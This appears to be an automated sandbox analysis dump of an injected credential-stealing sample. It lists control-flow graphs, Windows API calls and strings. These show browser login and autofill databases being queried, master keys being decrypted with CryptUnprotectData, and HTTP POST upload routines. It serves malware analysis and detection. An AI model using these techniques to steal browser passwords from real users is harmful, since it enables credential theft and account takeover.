                                    control_flow_graph 261 83098-830b1 call 81b6a 264 833ba-833c0 261->264 265 830b7-830cd 261->265 266 830cf-830d8 call 8302d 265->266 267 830e3-83128 call 81000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call d4bec 265->267 270 830dd-830df 266->270 274 8339b-833a4 DeleteFileW call 81011 267->274 275 8312e-83146 call beeb8 267->275 270->267 278 833a9-833ab 274->278 281 8314c-83158 call a02ec 275->281 282 83392-83396 call d3848 275->282 278->264 280 833ad-833b5 call 82ffa 278->280 280->264 287 83389-8338d call 9fb92 281->287 288 8315e-83161 281->288 282->274 287->282 289 83165-8317f call 81fa7 288->289 293 8336f-8337b call a02ec 289->293 294 83185-83196 289->294 293->289 303 83381-83385 293->303 295 8319c-831ac RtlCompareMemory 294->295 296 832cd-832e7 CryptUnprotectData 294->296 295->296 299 831b2-831b4 295->299 296->293 298 832ed-832f2 296->298 298->293 301 832f4-8330a call 81fa7 298->301 299->296 302 831ba-831bf 299->302 308 83318-8332f call 81fa7 301->308 309 8330c-83312 301->309 302->296 305 831c5-831ca 302->305 303->287 305->296 307 831d0-83253 RtlZeroMemory call 81000 305->307 321 832bd 307->321 322 83255-8326b call 81fa7 307->322 315 8333d-83343 308->315 316 83331-83337 308->316 309->308 311 83314 309->311 311->308 318 83351-8336a call 81798 * 3 315->318 319 83345-8334b 315->319 316->315 320 83339 316->320 318->293 319->318 324 8334d 319->324 320->315 323 832c1-832c8 call 81011 321->323 330 83279-8328e call 81fa7 322->330 331 8326d-83273 322->331 323->293 324->318 339 8329c-832bb call 81798 * 3 330->339 340 83290-83296 330->340 331->330 334 83275 331->334 334->330 339->323 340->339 341 83298 340->341 341->339
                                    APIs
                                      • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                      • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 000830F9
                                    • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083103
                                    • DeleteFileW.KERNELBASE(00000000), ref: 0008310A
                                    • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083115
                                    • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000831A4
                                    • RtlZeroMemory.NTDLL(?,00000040), ref: 000831D7
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000832DF
                                    • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0008339C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                    • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                    • API String ID: 2757140130-4052020286
                                    • Opcode ID: 7b8a3af755972ef78207df5a19dd5ecacb4dc09b70ee8be2efa8515fb43bf584
                                    • Instruction ID: 9eeee0a49cad79a680b91747a9da1137e025b2c57e8320bddd38074415eb84c5
                                    • Opcode Fuzzy Hash: 7b8a3af755972ef78207df5a19dd5ecacb4dc09b70ee8be2efa8515fb43bf584
                                    • Instruction Fuzzy Hash: 0691AD71208341ABE710EF64C844AAFBBE9BFC5B44F04092DF9C596252DB75DE05CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 348 83ed9-83ee7 349 83eed-83ef1 348->349 350 83fd1-83fdb 348->350 349->350 351 83ef7-83f21 call 81000 PathCombineW FindFirstFileW 349->351 354 83fca-83fcc call 81011 351->354 355 83f27-83f30 351->355 354->350 356 83f78-83f86 lstrcmpiW 355->356 357 83f32-83f40 lstrcmpiW 355->357 359 83faf-83fbd FindNextFileW 356->359 361 83f88-83fa3 call 81000 PathCombineW call 83e04 356->361 357->359 360 83f42-83f54 lstrcmpiW 357->360 359->355 362 83fc3-83fc4 FindClose 359->362 360->359 363 83f56-83f76 call 81000 PathCombineW call 83ed9 360->363 370 83fa8-83faa call 81011 361->370 362->354 363->370 370->359
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 00083F0A
                                    • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00083F16
                                    • lstrcmpiW.KERNEL32(?,000D62CC), ref: 00083F38
                                    • lstrcmpiW.KERNEL32(?,000D62D0), ref: 00083F4C
                                    • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00083F69
                                    • lstrcmpiW.KERNEL32(?,Local State), ref: 00083F7E
                                    • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00083F9B
                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00083FB5
                                    • FindClose.KERNELBASE(00000000), ref: 00083FC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                    • String ID: *.*$Local State
                                    • API String ID: 3923353463-3324723383
                                    • Opcode ID: c5aaf5cf6c109a5247499879bb6aba34656f063be9491def208fa3bdd5a4ad27
                                    • Instruction ID: 4d7f345a5cfc812a584ff706badc4d4ef345a41b1eec5ce1d2c75e72a3eebf84
                                    • Opcode Fuzzy Hash: c5aaf5cf6c109a5247499879bb6aba34656f063be9491def208fa3bdd5a4ad27
                                    • Instruction Fuzzy Hash: 3E21A1306007446BE750BB309C48ABF7BACBFC5B01B04052AFE92C6193DB7A994987B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 373 81d4a-81d5c 374 81d62-81d66 373->374 375 81eb4-81ebe 373->375 374->375 376 81d6c-81d77 call 819b4 374->376 379 81d79-81d89 call 81953 376->379 380 81d8b-81d97 call 81953 376->380 385 81d9b-81d9d 379->385 380->385 385->375 386 81da3-81db4 FindFirstFileW 385->386 387 81dba 386->387 388 81ead-81eaf call 81011 386->388 389 81dbe-81dc3 387->389 388->375 391 81e3d-81e6a call 81953 call 8199d lstrcmpiW 389->391 392 81dc5-81dd7 lstrcmpiW 389->392 403 81e6c-81e75 call 81cf7 391->403 404 81e87-81e89 call 81011 391->404 394 81ddd-81def lstrcmpiW 392->394 395 81e8e-81e9c FindNextFileW 392->395 394->395 397 81df5-81e00 call 819b4 394->397 395->389 398 81ea2-81ea9 FindClose 395->398 405 81e09 397->405 406 81e02-81e07 397->406 398->388 403->404 412 81e77-81e7f 403->412 404->395 408 81e0b-81e3b call 81953 call 8199d call 81d4a 405->408 406->408 408->404 412->404
                                    APIs
                                      • Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4
                                    • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00081DA9
                                    • lstrcmpiW.KERNEL32(?,000D62CC), ref: 00081DCF
                                    • lstrcmpiW.KERNEL32(?,000D62D0), ref: 00081DE7
                                    • lstrcmpiW.KERNEL32(?,?), ref: 00081E62
                                      • Part of subcall function 00081CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00082C27), ref: 00081D02
                                      • Part of subcall function 00081CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00081D0D
                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081E94
                                    • FindClose.KERNELBASE(00000000), ref: 00081EA3
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                    • String ID: *.*$\*.*
                                    • API String ID: 232625764-1692270452
                                    • Opcode ID: 65a225ab1a58f3f422f0424303caeb68fc7b63a73906993df938be3e58dc8cfd
                                    • Instruction ID: 283d2ebab425d3c3d28c1f47b27243124ba92c37555bb5800a8c20e13b937d5b
                                    • Opcode Fuzzy Hash: 65a225ab1a58f3f422f0424303caeb68fc7b63a73906993df938be3e58dc8cfd
                                    • Instruction Fuzzy Hash: E93185303043415BDB61BB749898AEF7BEEBFC4350F044929EDC683256DB7588468761

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 509 83e04-83e11 call 81b6a 512 83ed4-83ed8 509->512 513 83e17-83e22 call 81c31 509->513 513->512 516 83e28-83e34 call 82fb1 513->516 519 83ec8-83ecc 516->519 520 83e3a-83e4f call 8123b 516->520 519->512 523 83ec0-83ec7 call 81011 520->523 524 83e51-83e58 520->524 523->519 526 83e5a-83e6a 524->526 527 83ebf 524->527 528 83eb8-83eba call 81011 526->528 529 83e6c-83e7c RtlCompareMemory 526->529 527->523 528->527 529->528 531 83e7e-83ea6 CryptUnprotectData 529->531 531->528 533 83ea8-83ead 531->533 533->528 534 83eaf-83eb3 533->534 534->528
                                    APIs
                                      • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                      • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                      • Part of subcall function 00081C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00081C46
                                      • Part of subcall function 00081C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00083FA8), ref: 00081C56
                                      • Part of subcall function 00081C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00081C76
                                      • Part of subcall function 00081C31: CloseHandle.KERNEL32(00000000), ref: 00081C91
                                      • Part of subcall function 00082FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00082FC1
                                      • Part of subcall function 00082FB1: lstrlen.KERNEL32("encrypted_key":",?,00083FA8), ref: 00082FCE
                                      • Part of subcall function 00082FB1: StrStrIA.SHLWAPI("encrypted_key":",000D692C), ref: 00082FDD
                                      • Part of subcall function 0008123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00083E4B,00000000), ref: 0008124A
                                      • Part of subcall function 0008123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00081268
                                      • Part of subcall function 0008123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00081295
                                    • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00083E74
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00083E9E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                    • String ID: $DPAP$DPAP$IDPAP
                                    • API String ID: 3076719866-957854035
                                    • Opcode ID: b0c9ea34d8e176138a4a73a84b9b7ce8b8ee6a350bc51f57f81c0e8e45a0d846
                                    • Instruction ID: ebab245d5ddaada603f61cb381ac118924196a51c06e8ba3113981eb9092ee89
                                    • Opcode Fuzzy Hash: b0c9ea34d8e176138a4a73a84b9b7ce8b8ee6a350bc51f57f81c0e8e45a0d846
                                    • Instruction Fuzzy Hash: 422142726043456BD711FA68CC80ABFB6DDBFD4B10F44052EF985D6242EB78CE458B92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 667 e9247-e9275 668 e9277-e92a3 667->668 669 e92e1-e92eb 667->669 670 e92aa-e92be 668->670 671 e92a5-e92a7 668->671 672 e930e-e9342 669->672 673 e92ed-e92f8 669->673 674 e9238-e9245 671->674 675 e92a9 671->675 676 e9344-e9346 672->676 674->667 675->670 677 e9349-e934c 676->677 678 e9381-e93a5 676->678 677->676 679 e934e-e937a 677->679 680 e958d 678->680 681 e93ab-e93b8 678->681 682 e937c 679->682 683 e93e1 679->683 680->680 684 e93ca-e93cf 681->684 682->678 686 e93e3-e93e7 683->686 685 e93d1 684->685 687 e93d3 685->687 688 e93c0-e93c5 685->688 689 e93e9 686->689 690 e93f4-e93f7 686->690 694 e93d8-e93da 687->694 693 e93c6-e93c8 688->693 695 e93eb-e93f2 689->695 696 e9413-e9418 689->696 691 e93f9-e93fe 690->691 692 e9400-e9402 690->692 691->692 692->694 693->684 693->685 694->686 699 e93dc-e93de 694->699 695->690 695->696 697 e941a-e9423 696->697 698 e942b-e942d 696->698 700 e949a-e949d 697->700 701 e9425-e9429 697->701 702 e942f-e9434 698->702 703 e9436 698->703 699->683 704 e94a2-e94a5 700->704 701->703 702->703 705 e9438-e943b 703->705 706 e9404-e9406 703->706 709 e94a7-e94a9 704->709 710 e943d-e9442 705->710 711 e9444 705->711 707 e940f-e9411 706->707 708 e9408-e940d 706->708 712 e9465-e9474 707->712 708->707 709->704 713 e94ab-e94ae 709->713 710->711 711->706 714 e9446-e9448 711->714 717 e9476-e947d 712->717 718 e9484-e9491 712->718 713->704 719 e94b0-e94cc 713->719 715 e944a-e944f 714->715 716 e9451-e9455 714->716 715->716 716->714 720 e9457 716->720 717->717 721 e947f 717->721 718->718 722 e9493-e9495 718->722 719->709 723 e94ce 719->723 725 e9459-e9460 720->725 726 e9462 720->726 721->693 722->693 724 e94d4-e94d8 723->724 727 e951f-e9522 724->727 728 e94da-e94f0 LoadLibraryA 724->728 725->714 725->726 726->712 730 e9525-e952c 727->730 729 e94f1-e94f6 728->729 729->724 731 e94f8-e94fa 729->731 732 e952e-e9530 730->732 733 e9550-e9580 VirtualProtect * 2 730->733 734 e94fc-e9502 731->734 735 e9503-e9510 GetProcAddress 731->735 736 e9532-e9541 732->736 737 e9543-e954e 732->737 738 e9584-e9588 733->738 734->735 739 e9519-e951c 735->739 740 e9512-e9517 735->740 736->730 737->736 738->738 741 e958a 738->741 740->729 741->680
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_e7000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32cff0085485b113b410e7b3abe0a5548784767886e41f63bb0010d8f190109a
                                    • Instruction ID: dcaca065243f0d70f2ab4f0c9d63f603a6d20bde16016ca0a8fb04a3348964b3
                                    • Opcode Fuzzy Hash: 32cff0085485b113b410e7b3abe0a5548784767886e41f63bb0010d8f190109a
                                    • Instruction Fuzzy Hash: 39A16CB29147D25FDB218E79CCC4AA5BBE1EB52324B2C076CC9E1EB2C2E7605807C751
                                    APIs
                                      • Part of subcall function 00081162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0008116F
                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00084BB6
                                    • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00084BBF
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 1675517319-0
                                    • Opcode ID: d0a03c3171f669cc561320088f6ee0b01d3cc8f87ebe377cc262c45c340fd0ba
                                    • Instruction ID: ad46feb75ece9f9ea336e87747d93cc9b1d5618f1d304d4bead63fb95cb474d7
                                    • Opcode Fuzzy Hash: d0a03c3171f669cc561320088f6ee0b01d3cc8f87ebe377cc262c45c340fd0ba
                                    • Instruction Fuzzy Hash: BCE0D83180121167D654BB70FC5DBDB3F9CBF95361F10C525F2D592092CB36C8418760
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: 0417845d3711d0a8ab48dba37f0f1e8bfd2c70249a97d61b699baedc1fc7043a
                                    • Instruction ID: 3009fa2e25c99c58cd3ca466f84c0bc78be797b351bcccef6327f5f67131da02
                                    • Opcode Fuzzy Hash: 0417845d3711d0a8ab48dba37f0f1e8bfd2c70249a97d61b699baedc1fc7043a
                                    • Instruction Fuzzy Hash: A7A002795511155BFD4457E4DE0DA1A3718F745702F144545B54586051DD6954048731
                                    APIs
                                    • GetSystemInfo.KERNELBASE(000E20A4,00000001,00000000,0000000A,000D3127,000828DA,00000000,?), ref: 0008BFFC
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: InfoSystem
                                    • String ID:
                                    • API String ID: 31276548-0
                                    • Opcode ID: fbb64045412140bb3376d61c47bde30dc89874f3f158a0a622b249d2581c492c
                                    • Instruction ID: fcf2bef7cef12bb3f0d298ad8fb68d6f40796599fadd71bb1614cf323cac156c
                                    • Opcode Fuzzy Hash: fbb64045412140bb3376d61c47bde30dc89874f3f158a0a622b249d2581c492c
                                    • Instruction Fuzzy Hash: 61E0923178878078F62033B96C07FDA15446B80F20F614625B754BC1CFCFB780805222

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 206 83c40-83c52 call 81b6a 209 83c58-83c95 call 81000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call d4bec 206->209 210 83dfa-83e01 206->210 214 83c9a-83c9c 209->214 215 83dec-83df5 DeleteFileW call 81011 214->215 216 83ca2-83cba call beeb8 214->216 215->210 220 83cc0-83cdf call 81000 call a02ec 216->220 221 83de3-83de7 call d3848 216->221 227 83d9f-83da2 220->227 221->215 228 83da8-83db7 call 9fb92 lstrlen 227->228 229 83ce4-83cfa call 81fa7 227->229 236 83db9-83dd7 call 81798 * 3 228->236 237 83ddc-83dde call 81011 228->237 234 83d08-83d1d call 81fa7 229->234 235 83cfc-83d02 229->235 244 83d2b-83d33 lstrlen 234->244 245 83d1f-83d25 234->245 235->234 239 83d04 235->239 236->237 237->221 239->234 249 83d35-83d3a lstrlen 244->249 250 83d96-83d9a call a02ec 244->250 245->244 248 83d27 245->248 248->244 249->250 253 83d3c-83d6f call 81000 wsprintfA lstrlen 249->253 250->227 256 83d71-83d81 call 8102f 253->256 257 83d83-83d91 lstrcat call 81011 253->257 256->257 257->250
                                    APIs
                                      • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                      • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 00083C6A
                                    • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083C76
                                    • DeleteFileW.KERNEL32(00000000), ref: 00083C7D
                                    • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083C89
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00083D2F
                                    • lstrlen.KERNEL32(00000000), ref: 00083D36
                                    • wsprintfA.USER32 ref: 00083D55
                                    • lstrlen.KERNEL32(00000000), ref: 00083D61
                                    • lstrcat.KERNEL32(00000000,?), ref: 00083D89
                                    • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00083DB2
                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00083DED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                    • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                    • API String ID: 2923052733-3488123210
                                    • Opcode ID: 156d9d91afbf66ab9bacdf8f621a9befe06fdc2544cda769dd44be048fcfa586
                                    • Instruction ID: 5fc246d5280d0b4c4e5f44c9b136f416c62594648c96d7d0805e589a6c6bd98a
                                    • Opcode Fuzzy Hash: 156d9d91afbf66ab9bacdf8f621a9befe06fdc2544cda769dd44be048fcfa586
                                    • Instruction Fuzzy Hash: 1A416A31204341ABD711BB64DC81ABF7BEDBFC5744F004829F986A6253DA2ADD028B62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 418 81333-81385 call 81000 call 8106c call 812a3 425 813a0-813a3 418->425 426 81387-8139e 418->426 428 813aa-813ac 425->428 429 813b0-813b2 426->429 428->429 430 813b8-813ef RtlZeroMemory 429->430 431 815cb-815da call 81011 429->431 435 815c3-815ca 430->435 436 813f5-8141a 430->436 435->431 439 815bf 436->439 440 81420-81456 call 810b1 436->440 439->435 443 81458 440->443 444 8145d-81478 440->444 443->444 446 8147e-81483 444->446 447 815b5 444->447 448 8149d-814c7 call 81000 wsprintfW 446->448 449 81485-81496 446->449 447->439 452 814c9-814cb 448->452 453 814e0-81509 448->453 449->448 454 814cc-814cf 452->454 460 8150f-8151b 453->460 461 815a5-815b0 call 81011 453->461 455 814da-814dc 454->455 456 814d1-814d6 454->456 455->453 456->454 458 814d8 456->458 458->453 460->461 465 81521-81537 call 81000 460->465 461->447 468 81539-81544 465->468 469 81558-8156f 468->469 470 81546-81553 call 8102f 468->470 474 81571 469->474 475 81573-8157d 469->475 470->469 474->475 475->468 476 8157f-81583 475->476 477 8159a-815a1 call 81011 476->477 478 81585 call 8104c 476->478 477->461 482 8158a-81594 RtlMoveMemory 478->482 482->477
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                      • Part of subcall function 0008106C: lstrlen.KERNEL32(0067B176,00000000,00000000,00000000,00081366,75712B62,0067B176,00000000), ref: 00081074
                                      • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,0067B176,00000001,00000000,00000000), ref: 00081086
                                      • Part of subcall function 000812A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000812B5
                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 000813C2
                                    • wsprintfW.USER32 ref: 000814B5
                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081594
                                    Strings
                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 000814FB
                                    • Accept: */*Referer: %S, xrefs: 000814AF
                                    • POST, xrefs: 00081465
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                    • API String ID: 3833683434-704803497
                                    • Opcode ID: 830c9e34ae569718e1b24a9443c08e33e059627cae808b8f3f1a54efc27655ce
                                    • Instruction ID: 7d30e111299667a329711f4808220047800665f4415cfff5e0d1aa668d8bc341
                                    • Opcode Fuzzy Hash: 830c9e34ae569718e1b24a9443c08e33e059627cae808b8f3f1a54efc27655ce
                                    • Instruction Fuzzy Hash: 7D718A74608301AFD750AF24DC84AABBBEDFF88344F04092EF995C3252DB75D9058BA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 483 8a40e-8a424 484 8a4a2-8a4aa 483->484 485 8a426-8a42a 483->485 488 8a4ae-8a4c8 484->488 486 8a42c-8a42f 485->486 487 8a431-8a441 485->487 486->484 486->487 489 8a469-8a4a0 memcpy 487->489 490 8a443 487->490 491 8a4cc-8a4d8 488->491 489->488 492 8a44a-8a45a memcpy 490->492 493 8a445-8a448 490->493 494 8a4e1-8a4e3 491->494 495 8a45d 492->495 493->489 493->492 496 8a524-8a538 call 8a2aa 494->496 497 8a4e5-8a4ee 494->497 498 8a45f-8a466 495->498 496->495 503 8a53e-8a553 memset 496->503 497->496 502 8a4f0-8a4ff call 8a250 497->502 502->491 506 8a501-8a51f call 8a1c6 502->506 503->498 506->498
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memcpy$FileReadmemset
                                    • String ID: winRead$S
                                    • API String ID: 2051157613-3859733311
                                    • Opcode ID: bde34e08940a5130dac1807a5a62c036b30e63eb355d3be97c081e77bc4c7292
                                    • Instruction ID: a448c403023d706c5321a739c0c01a4e33aea86af15eac139fec1e7941e37ac6
                                    • Opcode Fuzzy Hash: bde34e08940a5130dac1807a5a62c036b30e63eb355d3be97c081e77bc4c7292
                                    • Instruction Fuzzy Hash: 4B318D72705340ABEB50EE18CC8599F77E6FFC5350F84692AF98597611D670EC048B93

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 535 8b87b-8b88a 536 8b88d-8b8e3 memset 535->536 537 8b903 536->537 538 8b8e5-8b8f3 call 8b64b 536->538 539 8b905-8b914 call 8b609 537->539 543 8b8f9-8b901 538->543 544 8baf3-8baf9 538->544 546 8b91a-8b923 call 8b828 539->546 547 8bae3 539->547 543->539 553 8b929-8b941 546->553 554 8bad6-8bae1 call 868ec 546->554 549 8bae8-8baf1 call 868ec 547->549 549->544 555 8b943-8b944 553->555 556 8b946-8b94d 553->556 554->549 558 8b950-8b962 555->558 556->558 560 8b965-8b96e 558->560 561 8b975-8b97c 560->561 562 8b9cb-8b9e4 call 8a2aa 561->562 563 8b97e-8b983 561->563 572 8ba41-8ba46 562->572 573 8b9e6-8b9fd call 868ec * 2 562->573 564 8b985-8b9aa call 86614 call 8bb9f call 86620 563->564 565 8b9b6-8b9c9 call 8a250 563->565 590 8b9ac-8b9b0 564->590 591 8b9b2 564->591 565->560 565->562 576 8ba48-8ba52 572->576 577 8ba54-8ba6e call 868ec * 2 572->577 588 8b9ff-8ba04 573->588 589 8ba14-8ba3c call 8a1c6 call d4db2 573->589 576->577 592 8ba70-8ba72 577->592 593 8ba74 577->593 588->589 594 8ba06-8ba0f 588->594 589->544 590->562 590->591 591->565 596 8ba79-8ba8a 592->596 593->596 594->536 598 8ba8c 596->598 599 8ba90-8baa2 call d52ae 596->599 598->599 604 8baa8-8bad4 599->604 605 8baa4 599->605 604->544 605->604
                                    APIs
                                    • memset.NTDLL ref: 0008B8D5
                                    • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0008B96F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CreateFilememset
                                    • String ID: psow$winOpen$S
                                    • API String ID: 2416746761-2586101589
                                    • Opcode ID: 12164cb21f261cdadd353abf1e934a4ba790bd36f114a5547278b584b4ed5aa7
                                    • Instruction ID: abee809fe31a5a6538aaceb5af34820908a67b249fbf2f2df2ee654d3b299c62
                                    • Opcode Fuzzy Hash: 12164cb21f261cdadd353abf1e934a4ba790bd36f114a5547278b584b4ed5aa7
